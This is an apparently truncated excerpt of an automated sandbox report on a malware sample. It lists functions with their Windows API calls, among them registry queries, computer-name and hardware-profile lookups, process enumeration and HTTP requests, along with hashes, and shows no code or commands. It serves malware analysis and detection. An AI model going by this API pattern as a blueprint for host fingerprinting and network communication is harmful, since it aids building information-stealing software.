Instruction Fuzzy Hash: 90F06275202746AFD310DF55DD88E5677A8FB85744F08881CF9059B394E7F46804CB96

Function 00438FCA Relevance: 1.9, APIs: 1, Instructions: 435
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00678F32), ref: 0043962D

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f86af38bbd06a89dcb361e902a6b7dc9a3dcea5dce6f83ab1ec15e0bc9fb232e
Instruction ID: 1a2d84d4775da3617951769062e97947583bbcc079f9237879b63a1436a51657
Opcode Fuzzy Hash: f86af38bbd06a89dcb361e902a6b7dc9a3dcea5dce6f83ab1ec15e0bc9fb232e
Instruction Fuzzy Hash: AD02AF713A5B04DFC308EB58EC99D1433E6EB58754B04802AE81AD7765FAF26C54CB2B

Function 00433A3C Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00433B30

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 47bc36b69f2674918b77f082231b11e76dfb2cee5c9266e0560a905a83ece530
Instruction ID: b10e1ec481a9b90b140a2026521b5d48f015f651800799be0992cb6fd0a61e6c
Opcode Fuzzy Hash: 47bc36b69f2674918b77f082231b11e76dfb2cee5c9266e0560a905a83ece530
Instruction Fuzzy Hash: 52718E72A001248FCB04DF6CDD81B99B3F0FFC9204F044179EA19D3352EA74AE588B9A

Function 00408754 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 0040875B

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 9849515c99776a96aab6ef631a1b587dc0ebb877d6b3bdab231ca1f6430e3e6d
Instruction ID: da0360d745333fbe959e16f5ba24e7737f7798b1a95b192d6209b24d338b7bae
Opcode Fuzzy Hash: 9849515c99776a96aab6ef631a1b587dc0ebb877d6b3bdab231ca1f6430e3e6d
Instruction Fuzzy Hash: 0831FA72A005288FCB14DFA8EC81ADC77B4EF98709B040024E52AD3266DA70EB55CF88

Function 0042706F Relevance: 1.6, APIs: 1, Instructions: 81
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32(?,00677BC7,00000000,?,?), ref: 00427177

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 43b2b59949358ee7d62d38bba9cb1c9b1d00e33da37f566c6713add48968dbc3
Instruction ID: 20885aa84259bc116820c6bfb066b52633aeda555e5157a871355ff936ebdaa5
Opcode Fuzzy Hash: 43b2b59949358ee7d62d38bba9cb1c9b1d00e33da37f566c6713add48968dbc3
Instruction Fuzzy Hash: 83312B72344344EFD754DF8ECE81E6A77E6AB88605F044628E446C7351EAF4F905CB1A

Function 004072EF Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(?), ref: 004072F7

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: e48fc24a648b12499edf97cbc3c0da3752ee38391eaa12b41e2b34e854e545a1
Instruction ID: 366d17a99b52cfda0ba1c6432930ee889da3bfff02396af4797cdf74c117579e
Opcode Fuzzy Hash: e48fc24a648b12499edf97cbc3c0da3752ee38391eaa12b41e2b34e854e545a1
Instruction Fuzzy Hash: EF312C72A00218CFDB14DF98EC91ADD73B5FF58609F044024E916E32A2DA30EF55CB98

Function 00406610 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004066E3

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CrackInternet
String ID:
API String ID: 1381609488-0
Opcode ID: 7301596c8ae130c413a8e335ed109669f30724f41c75767e8a6cef31879ad45e
Instruction ID: d0ffa79147fa862a27d00fc943b19e86054cfe69f4fd12eaae9517628bdadec8
Opcode Fuzzy Hash: 7301596c8ae130c413a8e335ed109669f30724f41c75767e8a6cef31879ad45e
Instruction Fuzzy Hash: C121F7B0600204AFEB54DF99DC84A5D77E4FF4D3A5F000224F914C7392D234E996CB6A

Function 00410FC0 Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 004110A1

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: ab9ab8f216446863b6f41e937027f7898c774551a8ce9d68b50b6674ad2ed687
Instruction ID: a609d455dadcda7d4da7f00a09e571967a80a940b9327cdee67abf928b1c9964
Opcode Fuzzy Hash: ab9ab8f216446863b6f41e937027f7898c774551a8ce9d68b50b6674ad2ed687
Instruction Fuzzy Hash: 32317372A003098BCB14DF69DD80ADAB3B5FF94304F048A19E849D7212EB70AB44CB95

Function 00409A20 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET ref: 00409AB1

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 3688a1a38a3c3ae001d35647d75b49d0dc6637fbdb5a2a1595deee64f18af3b6
Instruction ID: 9dbc942052e537e4330230e2d171a764f00cbff1e65de2c060d6ab12973a4d42
Opcode Fuzzy Hash: 3688a1a38a3c3ae001d35647d75b49d0dc6637fbdb5a2a1595deee64f18af3b6
Instruction Fuzzy Hash: 53216DB5A02218DFCB10DF6CDC8599AB7F4AF8C308B144165EC05D7312E6B0E951CBA5

Function 0042EC6D Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00032E90,?,00000000,00000000), ref: 0042ECC4

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4cec0ed782a452f304f1d219c5d6f818f2e2a7d5b77fbfd70856bf1af39b0323
Instruction ID: 4762d591fc6f0c4fe60047df32d5c3823bd2d28232a75d62ebb3b1e771563833
Opcode Fuzzy Hash: 4cec0ed782a452f304f1d219c5d6f818f2e2a7d5b77fbfd70856bf1af39b0323
Instruction Fuzzy Hash: 251173727403949FD204DF9CEC91F6973D9EB88B15F040029EA15D3392DAA5BE14CB5A

Function 00427590 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00677BEC,00000000,00020119), ref: 0042764D

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 35ed64751626a73277e632667e97cfea92f0e04211dfa39237b028439e9d949c
Instruction ID: 9ea5fefe8d3e641e7677b41d67b91943ceaf1bf65cf39850b069c84e2d892df0
Opcode Fuzzy Hash: 35ed64751626a73277e632667e97cfea92f0e04211dfa39237b028439e9d949c
Instruction Fuzzy Hash: 3311F111D1C7C297E260CF14CE617B667A4ABF6248F15A71EB88C56162EAB065D48302

Function 00426F1F Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00426FB7

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: fad0501151847a7fdac41513531f64ff5aa92b53cd785d1ccec49d788ed093a0
Instruction ID: 50753655269b6b2b5d32fdaf4a8f6b2c62ff3ea0718c284f8fe8931b48dd4938
Opcode Fuzzy Hash: fad0501151847a7fdac41513531f64ff5aa92b53cd785d1ccec49d788ed093a0
Instruction Fuzzy Hash: 45117CB1244345EFEB24DF99DE91E2A33E5EB84704F054429F40AD7261EAF0B805CB66

Function 00426130 Relevance: 1.5, APIs: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00677AAA,00000000,00020119), ref: 004261A8

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 920c331305b407d94639ccbc702ffdbbb74f872e2c4f0ec84cd1b2657e357f02
Instruction ID: 21212943e46117e0024b14406cd437a6a859100ab9bc1e5b446351ca66444414
Opcode Fuzzy Hash: 920c331305b407d94639ccbc702ffdbbb74f872e2c4f0ec84cd1b2657e357f02
Instruction Fuzzy Hash: 480167B1743600BFD314DB66DD8AF1577A6AB99751F054024F904BB390E6E4BC04CB66

Function 00426870 Relevance: 1.5, APIs: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00677B2C,00000000,00020119), ref: 004268E8

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6a775b98a1c560dfa1ebea150a5b1a9c7368b2a8969170a974c58e3a5febbae3
Instruction ID: 5f0db47a323a8f993686538fa900626cacdaeb3201946fc1ad1db0cda82bbed8
Opcode Fuzzy Hash: 6a775b98a1c560dfa1ebea150a5b1a9c7368b2a8969170a974c58e3a5febbae3
Instruction Fuzzy Hash: 44018476B05600BFD314DF69EE8EF1637B9AB44710F0A4064F981AB7A2D2F0AC048766

Function 00427669 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00677C0D,00000000,00000000,?,?), ref: 004276A8

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c9144bf87baf78544f095da3b93295139052dd9811355157a2233eb48e848b5f
Instruction ID: 164d9f89307f67f819941fd108be71c3aa5401c26c20480d42925199ea2173ca
Opcode Fuzzy Hash: c9144bf87baf78544f095da3b93295139052dd9811355157a2233eb48e848b5f
Instruction Fuzzy Hash: 33F09076704205BFC614DF58ED95F96B3A8EF94704F050429F248D7271E2F0B915CB96

Function 00408894 Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 004088E7

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 8ca54120230f2a6bea54dacb3bff6dfd957389c7eb43f4443f72b4f1e9286909
Instruction ID: 385738e456934dc9b3faf4e8899280b5c9d36c666f6dcfefe9d5c786f0352523
Opcode Fuzzy Hash: 8ca54120230f2a6bea54dacb3bff6dfd957389c7eb43f4443f72b4f1e9286909
Instruction Fuzzy Hash: E401F6B5E002198FCB14EFA8CD409AEB7F5FF48700B150069A815E7362CB30AE10CF94

Function 004261C4 Relevance: 1.5, APIs: 1, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00677AE5,00000000,00000000,?,?), ref: 00426205

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0ce3b7228593dd87f688bbae20df07978c10227b5de1304fb1bc2a4c5b27ea9f
Instruction ID: 4721a054740d1736ef7cd2e5809be4d37aae98eeabea58afd09450616e6921ba
Opcode Fuzzy Hash: 0ce3b7228593dd87f688bbae20df07978c10227b5de1304fb1bc2a4c5b27ea9f
Instruction Fuzzy Hash: 18F0B475303504BFC701DB5AEC89E19B3A9EF88301F044025FE4897360E2E57914CB26

Function 00409CEF Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET ref: 00409D1D

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 30b0db1278180047cf16761f1529211a281d889803e1e3e8e0d5325289a1ec37
Instruction ID: b909909ae5d908401e0ba5cf2340a72ed13b96fee01813f17bc55b83647bb0c1
Opcode Fuzzy Hash: 30b0db1278180047cf16761f1529211a281d889803e1e3e8e0d5325289a1ec37
Instruction Fuzzy Hash: 620136B0A03619EFDB10DF28C885F9A77B0AF4C718F104168F505D7291D7F1AA45CB55

Function 0040F7A0 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0040F7F0

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 16f2c5c7c9a3b7795fa532a6438501be873fa835b7774c1326f17a3a7c30fbf2
Instruction ID: 60a41b3984419230890062584c289c0947e43bfdadef45bad8595d77173a2e01
Opcode Fuzzy Hash: 16f2c5c7c9a3b7795fa532a6438501be873fa835b7774c1326f17a3a7c30fbf2
Instruction Fuzzy Hash: 64F0C2315043549FD301EF2DCD80E9777E5AFC9714F058228E88087362FB70AA85C696

Function 00426FD5 Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00677BB7,00000000,?,?), ref: 00427021

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a57365ab659ec1c57ac928d6eaf82ff00265aa717e7e2324cd78fb02b26cc856
Instruction ID: a488ec3abadc9f2314fea96c8afdf389639d714746c46663f3c8957b002898b7
Opcode Fuzzy Hash: a57365ab659ec1c57ac928d6eaf82ff00265aa717e7e2324cd78fb02b26cc856
Instruction Fuzzy Hash: 7CF0F4F1348344AFEB10DF59CE92E2633E8EB98604F050969E945D7391E6F0AD058B6A

Function 0042608A Relevance: 1.5, APIs: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00677AD8,00000000,00000000,?,?), ref: 004260CE

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a3e73c663c95f54103ed148dca430fc5e1fbe28f24785d64a9ad0538690d3e1b
Instruction ID: d3493d05c124d2c22cc6ca48e76e65b0c6505727409b6442ec15cec50f66dc62
Opcode Fuzzy Hash: a3e73c663c95f54103ed148dca430fc5e1fbe28f24785d64a9ad0538690d3e1b
Instruction Fuzzy Hash: 14F08C76244204BFD204EB08EE82F5573A8EF58750F02056AF948C7361E6B1AA028B96

Function 00426904 Relevance: 1.5, APIs: 1, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00677B5C,00000000,00000000,?,?), ref: 00426943

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 484f3469dde17adfcf1dfcf5aedc61403f9d1199f76eb91f986d5d87aaafc396
Instruction ID: 4286f73c8f36282d1b82f8670199632ee24d6f299e2eaf861376fb270af0c9f9
Opcode Fuzzy Hash: 484f3469dde17adfcf1dfcf5aedc61403f9d1199f76eb91f986d5d87aaafc396
Instruction Fuzzy Hash: 28F0A036705104FFC210EF98FD89E0673B9EB08700F0A4120FA89D7762E2F1E8148A76

Function 00426320 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(00000000), ref: 00426356

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9ba7438a3039689aa6dd400ab43401e624eb97cc02168a0c6631c408f3277a15
Instruction ID: e297d1d2d985c6d3ef2d0ada67c56a5ff4e4f1a8fc66c36a0ad78018c10a3c65
Opcode Fuzzy Hash: 9ba7438a3039689aa6dd400ab43401e624eb97cc02168a0c6631c408f3277a15
Instruction Fuzzy Hash: C8E06DB17015016BD718EF19DD84F6A2799EBC6350F094018F904D3390DAB098408A6A

Function 00426032 Relevance: 1.5, APIs: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00677AAA,00000000,00020119), ref: 00426073

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 34fed6a9563ed174b715a18762572829b98b42f5b0ab01fb3b4a96c4ef219fcd
Instruction ID: d153586b0610447867ff36fb3796083fd5be9b5c8df2c946f16255b41f39b3c9
Opcode Fuzzy Hash: 34fed6a9563ed174b715a18762572829b98b42f5b0ab01fb3b4a96c4ef219fcd
Instruction Fuzzy Hash: CAE01275344604AFD204EF18ED82F2533A5EF00744F17016EF90597292EAE1A9158B96

Function 0040F420 Relevance: 1.5, APIs: 1, Instructions: 22processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32 ref: 0040F466

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: be9362f060601f7946c27772b91c01970038e763e69a9c31abd94f20984068e6
Instruction ID: 1fec3b5e8a739f19f0635ea7dfdf9e2a1e69642f304033d07fc24b43efbc906b
Opcode Fuzzy Hash: be9362f060601f7946c27772b91c01970038e763e69a9c31abd94f20984068e6
Instruction Fuzzy Hash: DDF017B49093018BD308DF18D96479ABBF0AB5D304F01855CE889A3361EB309688CF46

Function 00426EC4 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32 ref: 00426EF9

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: e9e5e0bdce5bc27e0acffdd90d2a9395c1f7fa8fa8583d25882df99f4b499e41
Instruction ID: 0775445a35936f30a9a77f3b540feab9491524f503e7b61df130da9e221e04f6
Opcode Fuzzy Hash: e9e5e0bdce5bc27e0acffdd90d2a9395c1f7fa8fa8583d25882df99f4b499e41
Instruction Fuzzy Hash: BBF05EB0608742EFD718EF16C69056AB7F1BFC8204F04CE1EE48957620E7B0A585CF86

Function 00409B44 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET ref: 00409B72

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a84a9d95cab3fc1d01d6b1b9219db7ccdf0885523acdc1814047f8a774d9c774
Instruction ID: 82beb621c7da24baa7bdf350377abcd4c8a9c9fca0bc03dfce5e902414a4f585
Opcode Fuzzy Hash: a84a9d95cab3fc1d01d6b1b9219db7ccdf0885523acdc1814047f8a774d9c774
Instruction Fuzzy Hash: F6F05870E0A715CFC704CF18D08466AB7F1BF88709F00C65CE89C8B225E7B099858B86

Function 00429B98 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 00429BA6

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 70d7d957f54891b2145cf5a1a42a603dea027e0c41fb1ceb3646303fa318dd25
Instruction ID: 4b118137597e874e0878c2f4f373c1e3825403fc2b10870d072aaedf75e7e65f
Opcode Fuzzy Hash: 70d7d957f54891b2145cf5a1a42a603dea027e0c41fb1ceb3646303fa318dd25
Instruction Fuzzy Hash: 74E04FF57010406FD201FB29ECC9A56B324FB99B56F05401DF6448B251EB6498968761

Function 0040F8B8 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040F8DE

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3a76f61e41491fc073775149d6e03d5f7620253f78e55417b9abf86f480c23a3
Instruction ID: 48d76627dbc5d57d85cb1764ad730bd6c01465e7c7dda59787e031a3eb9f1586
Opcode Fuzzy Hash: 3a76f61e41491fc073775149d6e03d5f7620253f78e55417b9abf86f480c23a3
Instruction Fuzzy Hash: A1E0C935200205AFD705CF55D8C0DAAB7F5FF49700B054569E9418B261E771D990DB65

Function 00428CF0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00428D17

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ac13b13cc2bf3f970f7133cf79aebb08b26c289cc75a45f1fffff1adfdf19e2
Instruction ID: 60a2b233770afa7a53e9c8e4eed4ae4f0b5061a110e63fcb646c0f4f23e18197
Opcode Fuzzy Hash: 9ac13b13cc2bf3f970f7133cf79aebb08b26c289cc75a45f1fffff1adfdf19e2
Instruction Fuzzy Hash: ECE04F7A601380CFD304DF28DC98C1F7369ABC53383268A14EC10A77E4EB30ADC18A91

Function 00425E50 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00425E72

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: a98fcc094d973a231cd5bb8170693655fb729d116d679828af1b679b5eafb2c3
Instruction ID: b52fe88e2c0b078fce9f73dfb73c1b3bab0aff5a0b493dd1848ceb488b67eb7a
Opcode Fuzzy Hash: a98fcc094d973a231cd5bb8170693655fb729d116d679828af1b679b5eafb2c3
Instruction Fuzzy Hash: 56E0C2B22012046BD718EF24DD40D9B37BCABC7348F02842CE85483255EA70E804CBDA

Function 0042A470 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 0042A48A

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 85eb47bf0ebf8c70ec81be43f2990110e3ed7f88ac766839c40da548b7ed29e1
Instruction ID: 40da45fc82a50a7520541d3edf833ae1c63b91ac396760dd29cbe2d90feb92bc
Opcode Fuzzy Hash: 85eb47bf0ebf8c70ec81be43f2990110e3ed7f88ac766839c40da548b7ed29e1
Instruction Fuzzy Hash: 3EE0BD76712150AFCB08AF28D999E9977E8EF5A212305056DF902C7320EBB0ED018A16

Function 00409DC0 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 00409DD8

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 51a1d6e57771a1c459e086810df6cf7504df37a7522e6f564ac732c961f799b8
Instruction ID: 9fab87b2c41f548e0be38a789a3ddafd7423b99dd5bf4ffbfd325b06516827f1
Opcode Fuzzy Hash: 51a1d6e57771a1c459e086810df6cf7504df37a7522e6f564ac732c961f799b8
Instruction Fuzzy Hash: E0E04FB1A0221AEFDF00CF14CC88D86B772FF887087104458D409A7161D2B1AA47CB81

Function 00407220 Relevance: 1.5, APIs: 1, Instructions: 16filenetworkCOMMON

Download Yara Rule

APIs

